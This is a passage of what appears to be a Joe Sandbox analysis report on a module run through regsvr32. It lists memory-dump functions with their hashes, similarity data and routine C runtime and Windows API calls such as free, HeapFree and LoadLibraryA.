Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001FE0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015CB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EA77C Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID:
API String ID: 3186804695-0
Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
Instruction ID: 6173decc951507bb145471353b5fe90bff658eaf6da25985d2a5d2f1b92c41c7
Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
Instruction Fuzzy Hash: 2C318122B18BD14AEB55DF2AD5193AA67A1EF85BC0F584136EE4D0B7B9DE3CD401C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C4B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800157D8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024574 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
Instruction ID: b456e1b49498020112758906e0882963a909b4f1eceaef019be325c5d28b8920
Opcode Fuzzy Hash: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
Instruction Fuzzy Hash: E0317570629781ABC78CDF28C59591ABBE1FBD9344F806A2DF8868B350D774D445CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024458 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
Instruction ID: e1cdac85440212a901397aaa30fe146fec046d1320b50ea199ee65054a90651b
Opcode Fuzzy Hash: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
Instruction Fuzzy Hash: 0F317FB56187848B9388DF28C48641ABBE1FBDD30CF504B2DF8CAA6254D778D645CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F944 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800124B4 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800141C0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EDF20 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
Instruction ID: aa6f7b68a11dd81a1a1b1ffaafec433f72ac4d78dafea24141743cf7e35e9ca3
Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
Instruction Fuzzy Hash: 68B09B3570CB584647654B0758049156652B79CBD460440349D0D53B74D93C96414740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E98A4 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF8CB7E98B9

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

free.LIBCMT ref: 00007FF8CB7E98C2
free.LIBCMT ref: 00007FF8CB7E98CB
free.LIBCMT ref: 00007FF8CB7E98D4
free.LIBCMT ref: 00007FF8CB7E98DD
free.LIBCMT ref: 00007FF8CB7E98E6
free.LIBCMT ref: 00007FF8CB7E98EE
free.LIBCMT ref: 00007FF8CB7E98F7
free.LIBCMT ref: 00007FF8CB7E9900
free.LIBCMT ref: 00007FF8CB7E9909
free.LIBCMT ref: 00007FF8CB7E9912
free.LIBCMT ref: 00007FF8CB7E991B
free.LIBCMT ref: 00007FF8CB7E9924
free.LIBCMT ref: 00007FF8CB7E992D
free.LIBCMT ref: 00007FF8CB7E9936
free.LIBCMT ref: 00007FF8CB7E993F
free.LIBCMT ref: 00007FF8CB7E994B
free.LIBCMT ref: 00007FF8CB7E9957
free.LIBCMT ref: 00007FF8CB7E9963
free.LIBCMT ref: 00007FF8CB7E996F
free.LIBCMT ref: 00007FF8CB7E997B
free.LIBCMT ref: 00007FF8CB7E9987
free.LIBCMT ref: 00007FF8CB7E9993
free.LIBCMT ref: 00007FF8CB7E999F
free.LIBCMT ref: 00007FF8CB7E99AB
free.LIBCMT ref: 00007FF8CB7E99B7
free.LIBCMT ref: 00007FF8CB7E99C3
free.LIBCMT ref: 00007FF8CB7E99CF
free.LIBCMT ref: 00007FF8CB7E99DB
free.LIBCMT ref: 00007FF8CB7E99E7
free.LIBCMT ref: 00007FF8CB7E99F3
free.LIBCMT ref: 00007FF8CB7E99FF
free.LIBCMT ref: 00007FF8CB7E9A0B
free.LIBCMT ref: 00007FF8CB7E9A17
free.LIBCMT ref: 00007FF8CB7E9A23
free.LIBCMT ref: 00007FF8CB7E9A2F
free.LIBCMT ref: 00007FF8CB7E9A3B
free.LIBCMT ref: 00007FF8CB7E9A47
free.LIBCMT ref: 00007FF8CB7E9A53
free.LIBCMT ref: 00007FF8CB7E9A5F
free.LIBCMT ref: 00007FF8CB7E9A6B
free.LIBCMT ref: 00007FF8CB7E9A77
free.LIBCMT ref: 00007FF8CB7E9A83

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
Instruction ID: 2fae4f867fb66e9f579d726f64a66c58153b721fd29435ec4366f6fdb881dbd4
Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
Instruction Fuzzy Hash: B041C522A14AD1CAEE62EF33D4516BD6362AF84B94F056031DF0D4BBB7CE15E841C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E7BE8 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00007FF8CB7E7C06
_errno.LIBCMT ref: 00007FF8CB7E7C13

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

LoadLibraryA.KERNEL32 ref: 00007FF8CB7E7C4F
GetProcAddress.KERNEL32 ref: 00007FF8CB7E7C67
_errno.LIBCMT ref: 00007FF8CB7E7C75
GetLastError.KERNEL32 ref: 00007FF8CB7E7C7D
GetLastError.KERNEL32 ref: 00007FF8CB7E7CA0

Strings

SystemFunction036, xrefs: 00007FF8CB7E7C5D
ADVAPI32.DLL, xrefs: 00007FF8CB7E7C48

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
String ID: ADVAPI32.DLL$SystemFunction036
API String ID: 1558914745-1064046199
Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
Instruction ID: ae2733b5170f8a02b430cd4e708f63fbd4305642ccec68fbf56bd2816defbad4
Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
Instruction Fuzzy Hash: BC317025A09FA68BFB14AF67A41527923E4AF947D0F444434EE0D477F6EE3CE4158704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7F028C Relevance: 21.3, APIs: 14, Instructions: 348COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7F07CE), ref: 00007FF8CB7F02F9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7F07CE), ref: 00007FF8CB7F030D
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7F07CE), ref: 00007FF8CB7F0410

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: CompareErrorInfoLastString
String ID:
API String ID: 3723911898-0
Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
Instruction ID: 3e4f9196c233c52357d1693c4c01cd6046bdec407e7f94a79b95bbcb33feffd7
Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
Instruction Fuzzy Hash: 04E19C32A08BAA8BEB308F1294486B93796BF447D4F444539DE5E47BF4CE3CA945C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E76A0 Relevance: 19.7, APIs: 13, Instructions: 182COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF8CB7E77F1
SetConsoleCtrlHandler.KERNEL32 ref: 00007FF8CB7E7816
__doserrno.LIBCMT ref: 00007FF8CB7E7829
GetLastError.KERNEL32 ref: 00007FF8CB7E7831
DecodePointer.KERNEL32 ref: 00007FF8CB7E786F
EncodePointer.KERNEL32 ref: 00007FF8CB7E7884
DecodePointer.KERNEL32 ref: 00007FF8CB7E7899
EncodePointer.KERNEL32 ref: 00007FF8CB7E78AA
DecodePointer.KERNEL32 ref: 00007FF8CB7E78BF
EncodePointer.KERNEL32 ref: 00007FF8CB7E78D0
DecodePointer.KERNEL32 ref: 00007FF8CB7E78E5
EncodePointer.KERNEL32 ref: 00007FF8CB7E78F6
_errno.LIBCMT ref: 00007FF8CB7E792C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
String ID:
API String ID: 3466867069-0
Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
Instruction ID: d89b527a4de7fdbd927b6054cb25f0fa626f653576749229cf984cd38b026c23
Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
Instruction Fuzzy Hash: A771AD31E0DFF74BFA69AF1B94552792291AFA1BC4F58053ACE1E166F5DE2CE841C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E2E18 Relevance: 18.1, APIs: 12, Instructions: 82COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF8CB7E2E37

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

free.LIBCMT ref: 00007FF8CB7E2E45
free.LIBCMT ref: 00007FF8CB7E2E53
free.LIBCMT ref: 00007FF8CB7E2E61
free.LIBCMT ref: 00007FF8CB7E2E6F
free.LIBCMT ref: 00007FF8CB7E2E7D
free.LIBCMT ref: 00007FF8CB7E2E8E
free.LIBCMT ref: 00007FF8CB7E2EA6
_lock.LIBCMT ref: 00007FF8CB7E2EB0
free.LIBCMT ref: 00007FF8CB7E2EDE
_lock.LIBCMT ref: 00007FF8CB7E2EF3
free.LIBCMT ref: 00007FF8CB7E2F3D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$_lock$ErrorFreeHeapLast_errno
String ID:
API String ID: 1575098132-0
Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
Instruction ID: 9cd51af0589c63e46aee40b94c99efc754bfa3ee21b325d366c4ae40899cafb6
Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
Instruction Fuzzy Hash: B131DD21A1AFE28EFE69EE6390657797391AF80BD4F041535EE0E076B6CF1CE8418351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EA250 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF8CB7EA377

Part of subcall function 00007FF8CB7E7D10: GetLastError.KERNEL32 ref: 00007FF8CB7E7D79
Part of subcall function 00007FF8CB7E7D10: free.LIBCMT ref: 00007FF8CB7E7E05

free.LIBCMT ref: 00007FF8CB7EA540
free.LIBCMT ref: 00007FF8CB7EA550
free.LIBCMT ref: 00007FF8CB7EA560
free.LIBCMT ref: 00007FF8CB7EA56C
free.LIBCMT ref: 00007FF8CB7EA5C1
free.LIBCMT ref: 00007FF8CB7EA5C9
free.LIBCMT ref: 00007FF8CB7EA5D1
free.LIBCMT ref: 00007FF8CB7EA5D9
free.LIBCMT ref: 00007FF8CB7EA5E3

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$ErrorInfoLast
String ID:
API String ID: 189849726-0
Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
Instruction ID: 8877488ff978c74c2074647addaa6bf5b28267c3ca717f99d120ca6f71f5275b
Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
Instruction Fuzzy Hash: C9B18A32A08BE28BDB21CF26A4446A977A4FF49784F554135EE9C877B1DF39E541CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E4F04 Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF8CB7E4F50

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E16
Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E28
Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E3A
Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E4C
Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E5E
Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E70
Part of subcall function 00007FF8CB7E9DF8: free.LIBCMT ref: 00007FF8CB7E9E82

free.LIBCMT ref: 00007FF8CB7E4F72
free.LIBCMT ref: 00007FF8CB7E4F8A
free.LIBCMT ref: 00007FF8CB7E4F96
free.LIBCMT ref: 00007FF8CB7E4FBA
free.LIBCMT ref: 00007FF8CB7E4FCE
free.LIBCMT ref: 00007FF8CB7E4FDD
free.LIBCMT ref: 00007FF8CB7E4FE9
free.LIBCMT ref: 00007FF8CB7E5016
free.LIBCMT ref: 00007FF8CB7E503E
free.LIBCMT ref: 00007FF8CB7E5058

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
Instruction ID: 798205c8691d8a4ec53d1037ed24733d883123be98b41027bff6a3f522b2b567
Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
Instruction Fuzzy Hash: 7341EC32A09FE6CAEF65DE66D5503BD2391AF84BD4F081031DE0D4B6B6CE2DA891C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7F0A34 Relevance: 13.8, APIs: 9, Instructions: 256COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF8CB7F0A5C

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

__wtomb_environ.LIBCMT ref: 00007FF8CB7F0B55
_errno.LIBCMT ref: 00007FF8CB7F0B5F
free.LIBCMT ref: 00007FF8CB7F0C51
SetEnvironmentVariableA.KERNEL32 ref: 00007FF8CB7F0D9C
_errno.LIBCMT ref: 00007FF8CB7F0DAA
free.LIBCMT ref: 00007FF8CB7F0DB8
free.LIBCMT ref: 00007FF8CB7F0DC5
free.LIBCMT ref: 00007FF8CB7F0DD7

Memory Dump Source

